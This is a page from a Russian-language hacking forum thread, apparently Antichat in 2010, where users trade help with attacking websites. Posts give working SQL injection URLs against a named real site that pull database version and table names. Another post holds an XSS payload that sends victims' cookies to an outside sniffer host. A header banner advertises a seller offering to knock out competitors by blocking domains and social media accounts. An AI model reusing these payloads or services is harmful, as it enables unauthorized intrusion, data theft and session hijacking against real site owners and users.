УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1433 из 2438

1433

Опции темы

Поиск в этой теме

Опции просмотра

#14321

12.07.2010, 01:44

Dare

Новичок

Регистрация: 26.04.2010

Сообщений: 26

Провел на форуме:
136979

Репутация: 53

Отправить сообщение для Dare с помощью ICQ

Decoy

Ну если первый запрос не сработал значит там нет таблиц отвечающих критерию запроса => нужно составить запрос по другому, пробуй захексить column_name=user

без процентиков, а вобще с линком былобы просще... сори больше не знаю что тебе посоветовать)

PS:проверь таблицы вставив в принтабельное поле count(*) фромь так же как в посте выше.

#14322

12.07.2010, 05:06

zlo12

Постоянный

Регистрация: 28.12.2007

Сообщений: 328

Провел на форуме:
3054717

Репутация: 170

Отправить сообщение для zlo12 с помощью ICQ

тупой вопрос, раньше их пропускал, а ща задумался.

Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?

#14323

12.07.2010, 05:11

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от zlo12

zlo12 said:
тупой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?

смотря какой фильтр, все зависит от кода

#14324

12.07.2010, 06:15

happygirl

Guest

Сообщений: n/a

Провел на форуме:
2597

Репутация: 0

http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(version() ),0x71),0x71),4,5--+

->5.0.91-community

http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(table_nam e),0x71),0x71),4,5 %20from%20information_schema.tables%20where%20tabl e_schema='jain4_jain4jain' limit 1,1--+

Не обуви стол?

#14325

12.07.2010, 06:41

zlo12

Постоянный

Регистрация: 28.12.2007

Сообщений: 328

Провел на форуме:
3054717

Репутация: 170

что тут можно сделать? 9 алертов вылезает.

http://www.unsigned.com/scriptalertscript

#14326

12.07.2010, 10:26

Boa

Новичок

Регистрация: 30.05.2010

Сообщений: 25

Провел на форуме:
67694

Репутация: 5

Цитата:

Сообщение от R0nin

R0nin said:
Вот например:

Код:

Code:
http://*.ru/archive.php?year=img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"

Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло

Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.

#14327

12.07.2010, 11:51

Decoy

Новичок

Регистрация: 04.12.2005

Сообщений: 6

Провел на форуме:
27773

Репутация: 1

Dare

/showpost.php?p=2243791&postcount=14265

Попробовал

Код:

Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+

Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?

#14328

12.07.2010, 12:11

Dare

Новичок

Регистрация: 26.04.2010

Сообщений: 26

Провел на форуме:
136979

Репутация: 53

Цитата:

Сообщение от Decoy

Decoy said:
Dare
/showpost.php?p=2243791&postcount=14265
Попробовал

Код:

Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+

Мб что просто нет к ней доступа (прав не хватает), но ты же грил что некоторые таблицы читал?

Без линка увы ни чем помочь не смогу, если что стучи в асю или ПМ

Последний пост на эту тему!

#14329

12.07.2010, 12:32

Decoy

Новичок

Регистрация: 04.12.2005

Сообщений: 6

Провел на форуме:
27773

Репутация: 1

Dare

Ссылка выше.

Я думаю, если проблема в правах доступа, то сайт выдал бы ошибку (из-за нехватки аргументов), как если сделать select 1,2,3,4 вместо select 1,2,3,4,5.

PS Постучал по ICQ.

#14330

12.07.2010, 14:37

Unknown

Guest

Сообщений: n/a

Провел на форуме:
54576

Репутация: 8

Цитата:

Сообщение от Boa

Boa said:
Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло
Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.

Надеюсь там есть уязвимость XSS-injection ?

Если что открой страницу кода и посмотри как он там передался.

Страница 1433 из 2438

1433

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход